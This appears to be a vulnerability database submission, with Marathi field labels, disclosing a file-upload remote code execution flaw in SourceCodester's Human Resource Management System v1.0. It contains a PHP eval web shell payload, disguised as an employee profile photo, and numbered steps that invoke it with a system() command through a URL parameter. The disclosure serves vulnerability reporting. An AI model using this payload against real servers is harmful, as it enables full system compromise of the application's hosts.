| पदवी | Human Resource Management System v1.0 - Remote Code Execution via File Upload Vulnerbility |
|---|
| वर्णन | # Exploit Title: Human Resource Management System v1.0 - Remote Code Execution via File Upload Vulnerbility
# Exploit Author: Pratik Shetty
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
# CVE: ytd
Description: In Human Resource Management System version 1.0 there is a File upload vulnerability which leads to Remote Code Execution. In that any attacker can execute malicious command and get the system access completely.
Payload:
<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>
Steps:
1) Login into the admin account
2) Now go to add employee
3) Now in that fill the details
4) Now upload "profile photo" in that upload a malicious PHP file.
Payload: <?php eval ("echo ".$_REQUEST["parameter"].";"); ?>
5) Now save the data of this new employee
6) Go to his Profile and open the profile photo in next tab
7) Now in the above URL type this
?parameter=value;system('ls -l');
8) As you can see our command injection is been executed |
|---|
| उपयोगकर्ता | draco (UID 24011) |
|---|
| आधीनता | 13/10/2022 03:09 PM (3 वर्षानुवर्षे ago) |
|---|
| नेमस्तपणा | 13/10/2022 04:53 PM (2 hours later) |
|---|
| स्थान | मान्य केले |
|---|
| VulDB entry | 210772 [SourceCodester Human Resource Management System 1.0 Profile Photo parameter विशेषाधिकार वाढीचे प्रमाण वाढले] |
|---|
| मुद्दे | 17 |
|---|